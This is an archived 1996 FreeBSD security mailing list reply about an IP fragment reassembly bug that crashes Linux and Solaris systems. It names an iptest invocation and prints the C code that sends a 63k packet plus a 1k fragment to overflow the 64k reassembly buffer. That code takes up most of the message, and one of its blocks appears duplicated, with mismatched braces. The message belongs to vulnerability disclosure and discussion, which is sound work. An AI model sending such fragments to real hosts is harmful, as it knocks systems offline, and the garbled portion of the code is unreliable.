From owner-freebsd-security  Tue Oct 22 06:38:07 1996
Return-Path: owner-security
Received: (from root@localhost)
          by freefall.freebsd.org (8.7.5/8.7.3) id GAA28830
          for security-outgoing; Tue, 22 Oct 1996 06:38:07 -0700 (PDT)
Received: from cheops.anu.edu.au (avalon@cheops.anu.edu.au [150.203.76.24])
          by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id GAA28820
          for <security@freebsd.org>; Tue, 22 Oct 1996 06:38:01 -0700 (PDT)
Message-Id: <199610221338.GAA28820@freefall.freebsd.org>
Received: by cheops.anu.edu.au
	(1.37.109.16/16.2) id AA045211312; Tue, 22 Oct 1996 23:35:12 +1000
From: Darren Reed <avalon@coombs.anu.edu.au>
Subject: Re: [bugtraq] Serious Linux Security Bug
To: lutz@muc.de (Lutz Albers)
Date: Tue, 22 Oct 1996 23:35:12 +1000 (EST)
Cc: security@freebsd.org
In-Reply-To: <v03007802ae925cb8a72c@[192.168.42.51]> from "Lutz Albers" at Oct 22, 96 01:15:53 pm
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk


Solaris2 was, I believe, vulnerable to this bug too.
>From the "Crashable" file for iptest:
        Solaris 2.4 - upto and including 101945-34, > 34 ?
        Solaris 2.5 - 11/95

For those with it handly, "iptest -1 -p 8".

but I built in some random lossage which may stop it triggering the bug.
I think if the lossage is taken out, some systems will try to reassemble
it all into a buffer which (of course), is at max. 64k in size.

However, it doesn't try to send an ICMP packet, the following segment of
code is what triggeres it:

        if (!ptest || (ptest == 8)) {
                struct  timeval tv;

                gettimeofday(&tv, NULL);
                srand(tv.tv_sec ^ getpid() ^ tv.tv_usec);
                /*
                 * Part8: 63k packet + 1k fragment at offset 0x1ffe
                 */
                ip->ip_off = IP_MF;
                u->uh_dport = htons(9);
                ip->ip_id = htons(id++);
                printf("1.8. 63k packet + 1k fragment at offset 0x1ffe\n");
                ip->ip_len = 768 + 20 + 8;
                if ((rand() & 0x1f) != 0) {
                        (void) send_ip(nfd, mtu, ip, gwip, 1);
                        printf("%d\r", i);
                } else
                        printf("skip 0\n");

                ip->ip_len = MIN(768 + 20, mtu - 68);
                i = 512;
                for (; i < (63 * 1024 + 768); i += 768) {
                        ip->ip_off = IP_MF | (i >> 3);


                        ip->ip_off = IP_MF | (i >> 3);
                        if ((rand() & 0x1f) != 0) {
                                (void) send_ip(nfd, mtu, ip, gwip, 1);
                                printf("%d\r", i);
                        } else
                                printf("skip %d\n", i);
                        fflush(stdout);
                        PAUSE();
                }
                ip->ip_len = 896 + 20;
                ip->ip_off = IP_MF | (i >> 3);
                if ((rand() & 0x1f) != 0) {
                                (void) send_ip(nfd, mtu, ip, gwip, 1);
                                printf("%d\r", i);
                        } else
                                printf("skip %d\n", i);
                        fflush(stdout);
                        PAUSE();
                }
                ip->ip_len = 896 + 20;
                ip->ip_off = IP_MF | (i >> 3);
                if ((rand() & 0x1f) != 0) {
                        (void) send_ip(nfd, mtu, ip, gwip, 1);
                        printf("%d\r", i);
                } else
                        printf("skip\n");
                putchar('\n');
                fflush(stdout);
        }


Don't work against any system using a BSD based IP networking  code.

Darren